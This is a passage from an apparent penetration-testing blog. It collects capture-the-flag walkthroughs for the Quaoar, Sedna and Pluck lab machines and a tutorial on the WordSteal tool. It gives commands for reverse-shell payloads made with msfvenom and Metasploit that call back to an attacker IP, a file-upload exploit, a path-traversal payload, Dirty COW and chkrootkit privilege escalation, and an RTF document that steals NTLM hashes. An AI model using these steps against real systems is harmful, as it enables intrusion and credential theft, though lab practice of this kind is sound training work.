Hence our first task is completed!!

Now type following command to obtain flag:-

Cd /home

Cd wpadmin

Cat flag.txt

2bafe61f03117ac66a73c3c514de796e (1st flag)

Now dig up more to achieve next flag so that we can complete second challenge also.

Cd www

Cd wordpress

Cat wp-config.php

Wp-config.php file helps me in achieving second task of this lab this file contains MYSQL Setting where I found credential for user root. If you will notice given below screenshot you can also read the username as well as its password (root: rootpassword)

Now try to login for root privilege by typing following

Roo password

Great!!! We have completed second challenge also.

Cd root

Cat flaf.txt

8e3f9ec016e3598c5eec11fd3d73f6fb (2^nd flag)

After many efforts I enrolled in etc where I found one more directory cron.dthen I penetrate more inside and luckily capture third flag also and beat all three challenges.

Cd cron.d

cat php5

d46795f84148fd338603d0d6a9dbf8de (3rd flag)

Boo-yah! We have successfully captured all 3 flags.

Today we are going to solve another vunhub’s lab challenges “SEDNA” which contains 4 flags on this machine One for a shell, One for root access and Two for doing post exploitation on Sedna. For doing practice you can download it from here.

Let’s start!!!

Scan particular IP with version scan using Nmap tool as given in the image.

nmap -sV 192.168.0.113

Here it point up the open ports and running services on it. As shown port 22, 53, 80 and etc. are open.

Since port 80 is open therefore let explore target IP: 192.168.0.113 on the browser. From screenshot you can see I have not got any significant thing from here.

Shortly I had used nikto for entire scan and here you can see it has revealed license.txt from the highlighted text in the given screenshot.

Again I move towards browser to look at license.txt here I found the name of software “BUILDERENGINE” which might be used in this machine.

Then I enrolled into Google in hope to seek any exploit related to this software.

Luckily! the first link of the web page took me in the right direction here I found builder “engine 3.5.0 arbitrary file uploadExploit DB”.

When you will open this link you’ll notice an html code as shown in the given below screenshot. Copy this html code (..... ) and past it inside a text file.

Now inside your text file replace localhost from target IP http:// 192.168.0.113 and save with .html extension, I have saved it as file.html.

Above html code will create a form for file uploading; now use msfvenom to generate malicious PHP script and type following command.

msfvenom –p php/meterpreter/reverse_tcp lhost=192.168.0.104 lport=4444 –f raw

From screenshot you can read the generated PHP script, at this instant we need to copy the text from *.

Next I will upload my shell.php file on target machine and to perform this we need to open file.html file where it will permit you to browse shell.php after that once you have select your file for uploading click on send button.

Great!!! Our backdoor has uploaded successfully and from next screenshot you can observe I have obtained the path where my shell.php has been uploaded.

Now let’s dig up above highlighted path in the browser 192.168.0.113/file; so here again you can observe shell.php under index of files. When you will click on shell.php file you will get meterpreter session at the background of metasploit framework.

NICE!!! We have got victim’s meterpreter session; now time to capture the flags.

Meterpreter> cd/var/www

Meterpreter>ls

Meterpreter>cat flag.txt

Here we have got 1^stflag successfully!

Now turn into another directory to find our next flag.

Meterpreter>cd/etc

Meterpreter> cd chkrootkit

Meterpreter>ls

Meterpreter>cat README

Under README file I came to know its version i.e. chkrootkit V.0.49

When I investigate more related to this then I found an exploit inside the metasploit.

Chkrootkit before 0.50 will run any executable file named /tmp/update as root, allowing a trivial privilege escalation. WfsDelay is set to 24h, since this is how often a chkrootkit scan is scheduled by default.

Use exploit/unix/local/chkrootkit

Msf exploit (chkrootkit)>options

Msf exploit (chkrootkit)>set session1

Msf exploit (chkrootkit)>exploit

Here we have got command shell session victim with root privilege

Msf exploit (chkrootkit)>set session –I 2

Cat flag.txt

Awesome!!! We have captured 2^nd flag also.

Now try to find out flag 3^rd and 4^thyourself to complete this task. GOOD LUCK!!!

Coming towards another tutorial of vulnhub’s lab challenges “pluck” you can download it from here.

This lab is quite simple this article may help you to solve the task for capturing the flag.

LET’S START!!!

192.168.1.115 is my target IP let enumerate through aggressive scan using NMAP. You can observe its result from given screenshot.

Nmap –p- -A 192.168.1.115

Use nikto to dig up more information related to target

Nikto –h http://192.168.1.115

Finally I have got something very remarkable here if you notice the given below image the highlighted text looks like local file inclusion vulnerability.

So when I explore the above highlighted text in the browser here I got more than enough data. The highlighted text denotes towards some kind of backup script file path.

http://192.168.1.115/index.php?page=../../../../../../../../etc/passwd

When again I walk around it now further I found a tar file for backup.

http://192.168.1.115/index.php?page=/usr/local/scripts/backup.sh

Download tar file of backup script, type following command inside the terminal of your kali Linux.

Wget http://192.168.1.115/index.php?page=/backups/backup.tar

Now type following command to extract backup.tar file

Tar –xvf index.php\?page\=%2Fbackups%2Fbackup.tar

Inside it I found homefolder which further contains sub folder for 3 users.

Among all 3 users only paul has keys

cd paul

cd keys

So here I found 6 keys, let use one of them for connection.

Ssh –I id_key4 paul@192.168.1.115

When you will try to connect with target using ssh simultaneously a new terminal “Pdmenu” will pop up. Here I got so many option but I choose Edit file option that gave me a prompt to edit any file and it look like command injection vulnerability.

Now load metasploit framework and type following

Msfconsole

use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set target 1

msf exploit (web_delivery)>set payload php/meterpreter/reverse_tcp

msf exploit (web_delivery)>set lhost 192.168.1.15 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set svrport 8081

msf exploit (web_delivery)>exploit

Now copy the generated command php….5tz’));” and send it to target

Now paste above command as shown in the screenshot and hit enter which will give you reverse connection at the background inside metasploit.

Great!!! We have got victim’s meterpreter session

Meterpreter>shell

Uname –a

When I looked in Google I found Kernel 4.8.0 has Dirty cow vulnerability it is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem.

Here got the path to download exploit which might be related to it.

Open this path “http://www.exploit-db.com/download/40616” in browser and downloads the exploit for dirty cow vulnerability. I have saved this exploit as raj.

Now type following command to compile your exploit so that it can run successfully inside your Kali Linux.

Gcc shell.c –o raj –pthread

Now we can run our exploit to achieve root permission and try to capture the flag

./raj

Cd /root

Cat flag.txt

Bravo!!! We have captured the flag an beat this task………..

Hello! Today you will found something incredible in this article which is related to a newly lunched script named as “WORD STEAL” that can define your hacking skill more and more. This script will create a POC that will steal NTML hashes from a remote computer.

Microsoft Word has the ability to include images from remote locations. This is an undocumented feature but was found used by malware creators to include images through http for statistics. We can also include remote files to a SMB server and the victim will authenticate with his logins credentials. This is very useful during a Pentest because allows you to steal credentials without triggering any alerts and most of the security apps do not detect this.

LET’s Broach!!!

Attacker: Kali Linux

Target: Windows 10 (Microsoft Word 2007)

First we need to download it from Git hub, open the terminal in your Kali Linux and type following command.

Git clone https://github.com/0x090x0/WordSteal.git

Now open the downloaded folder word steal where you will get a python script “main.py” give all permissions to main.py script if required.

Chmod 777 main.py

As author has described that this script will convert an image or say .jpg into .rtf (Microsoft word file) The Rich Text Format is a proprietary document file format with published specification developed by Microsoft Corporation for cross-platform document interchange with Microsoft products.

After then downloadan image and save it inside Wordsteal folder, since I have an image “1.jpg” at this moment we require to type following command which generates .rtf file that steal NTML hashes from a remote computer.

Python main.py 192.168.0.104 1.jpeg 1

Above command will generate .rtf file as you can figure out this in the given screenshot, after then send1.rtf file to remote PC.

When victim will open 1.rtf (as Microsoft word file) in his system, on other hand attack will receive NTML hashes.

Inside word steal we have stolen credentials without triggering any alerts which you can observe in following image.

Now use password crack tool to read password_netntlmv2 file or type following command

John password_netntlmv2

Cool!!! We can see victim’s credential clearly RAJ: 123 that might be further use for login.

Understanding Redirection with Hashing and Crypto Salt (Part 2)

7 ways to Exploit RFI Vulnerability

Stored XSS Exploitation in DVWA (Beginner Guide)

Understanding HTTP Authentication Basic and Digest

CSRF Tutorial For Begineers in DVWA

How to set and Bypass Outbound Rule in Windows Firewall using Metasploit

Bypass CSRF Medium Security in DVWA

How to Upgrade Shell to Meterpreter

Capture VNC Session of Remote PC using Msfvenom

Shell to Meterpreter using Session Command

Hiding Shell with Prepend Migrate using Msfvenom

Run OS Command in Multiple Session in Metasploit

How to Enable and Monitor Firewall Log in Windows PC

How to Delete Firewall Log in Remote PC using Metasploit

Capture VNC Session of Remote PC using Settoolkit

Bypass Windows Login Password using Android Phone with DriveDroid

Hack the Quaoar VM (CTF Challenge)

Hack the Sedna VM (CTF Challenge)

Hack the Pluck VM (CTF Challenge)

Stealing Windows Credentials of Remote PC with MS Office Document